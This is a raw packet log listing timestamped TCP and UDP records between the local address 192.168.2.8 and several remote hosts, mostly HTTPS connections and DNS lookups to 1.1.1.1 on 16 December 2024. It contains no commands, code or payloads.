                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.659512043 CET49861443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.659534931 CET44349861116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.756711960 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.756784916 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.756908894 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.757137060 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:40.757149935 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.107408047 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.107582092 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.107644081 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.123373985 CET49813443192.168.2.823.57.90.152
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.123395920 CET4434981323.57.90.152192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.123436928 CET49807443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.123464108 CET4434980723.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.317090034 CET44349863116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.317166090 CET44349863116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.317270994 CET49863443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.317270994 CET49863443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.318197012 CET49863443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:41.318219900 CET44349863116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.158219099 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.158277988 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.169118881 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.169145107 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178215027 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178231955 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178467989 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178481102 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178567886 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178585052 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178659916 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:42.178678036 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:43.637934923 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:43.638118982 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:43.638243914 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:43.639081955 CET49865443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:43.639127970 CET44349865116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.394217014 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.394332886 CET4434982723.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.394422054 CET49827443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.722997904 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.723086119 CET4434983323.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:45.723134995 CET49833443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.321319103 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.321506977 CET4434984523.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.321592093 CET49845443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.408143044 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.408250093 CET4434984423.57.90.146192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.408314943 CET49844443192.168.2.823.57.90.146
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.721898079 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.721951962 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.722026110 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.722271919 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:49.722289085 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.744807959 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.744870901 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.744966030 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.745192051 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:50.745203018 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123161077 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123430014 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123838902 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.123851061 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125575066 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125579119 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125669003 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125685930 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125691891 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125698090 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125792980 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:51.125811100 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.144891977 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.144957066 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.145360947 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.145386934 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.146948099 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.146958113 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.147008896 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.147020102 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.432750940 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.432825089 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.432873011 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.433763027 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.433763027 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.738544941 CET49869443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.738583088 CET44349869116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.771728992 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.771770000 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.771822929 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.772363901 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.772382975 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.302987099 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.303085089 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.303164959 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.303672075 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.402174950 CET49870443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.402214050 CET44349870116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793081045 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793140888 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793210030 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793488979 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.793508053 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179291010 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179373026 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179744959 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.179752111 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181391954 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181396008 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181431055 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.181436062 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.194895029 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.194978952 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.195413113 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.195422888 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197043896 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197050095 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197081089 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.197089911 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222179890 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222258091 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222259998 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.222305059 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.223102093 CET49871443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.223124981 CET44349871116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.823995113 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.824101925 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.824197054 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.824491024 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.824521065 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.275625944 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.275708914 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.275726080 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.275794983 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.276575089 CET49872443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.276618958 CET44349872116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.021015882 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.021116972 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.021192074 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.021502972 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.021533012 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.229880095 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.229993105 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.230429888 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.230458021 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.232084036 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.232098103 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.232176065 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.232191086 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.278408051 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.278553009 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.278556108 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.278609991 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.279522896 CET49873443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.279546976 CET44349873116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.433621883 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.433736086 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.434196949 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.434225082 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.436156988 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.436170101 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.436232090 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:58.436249018 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.601305008 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.601372004 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.601421118 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.601466894 CET49874443192.168.2.8116.203.12.114
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.601486921 CET44349874116.203.12.114192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:59.601521969 CET49874443192.168.2.8116.203.12.114

                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 16, 2024 13:45:59.716845036 CET6032053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:45:59.946110010 CET53603201.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:37.994612932 CET5965253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:38.131934881 CET53596521.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.086894989 CET5765453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.402167082 CET53576541.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:40.937463999 CET138138192.168.2.8192.168.2.255
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.733422041 CET5882853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.733752012 CET6118753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.757946968 CET53560971.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.795051098 CET53648131.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.870940924 CET53611871.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:55.877623081 CET53588281.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:46:58.533176899 CET53600611.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:00.249315023 CET53556031.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.208626032 CET4959753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.210082054 CET5197253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:11.349066019 CET53519721.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.130533934 CET6541053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:14.134114981 CET5376753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.123812914 CET6159853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.123862028 CET5402553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.267926931 CET53615981.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.371644020 CET53540251.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.703663111 CET5585853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.703860044 CET4921853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.704943895 CET6272253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.705298901 CET6370153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.778506994 CET5676653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.778997898 CET5327553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.841986895 CET53558581.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.842006922 CET53627221.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.842021942 CET53492181.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.846132040 CET53637011.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.917495012 CET53567661.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:15.922132015 CET53532751.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.136090040 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:18.439069986 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.038553953 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.039237022 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.220851898 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.221016884 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.221035004 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.221297979 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.223274946 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.224011898 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.227768898 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.249633074 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.338843107 CET56535443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.353854895 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.471080065 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.471080065 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.472141027 CET6007953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.472148895 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.472729921 CET5742753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.473676920 CET5551353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.474136114 CET5105953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.474925995 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.486568928 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.537909031 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.538007021 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.538021088 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.538034916 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.538569927 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.538569927 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.544979095 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.545419931 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546437979 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546503067 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546633005 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546649933 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.546721935 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.548758984 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.565128088 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.565923929 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.566348076 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.566363096 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.566409111 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.570686102 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610165119 CET53574271.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.610693932 CET53600791.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.612885952 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.616808891 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.630300999 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.785204887 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.785823107 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.788623095 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.788851976 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.801968098 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.804411888 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.804694891 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.805083990 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.854304075 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.884001017 CET60154443192.168.2.8172.64.41.3
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.927443981 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.928411007 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.931390047 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.932372093 CET44360154172.64.41.3192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:19.932471991 CET44360154172.64.41.3192.168.2.8
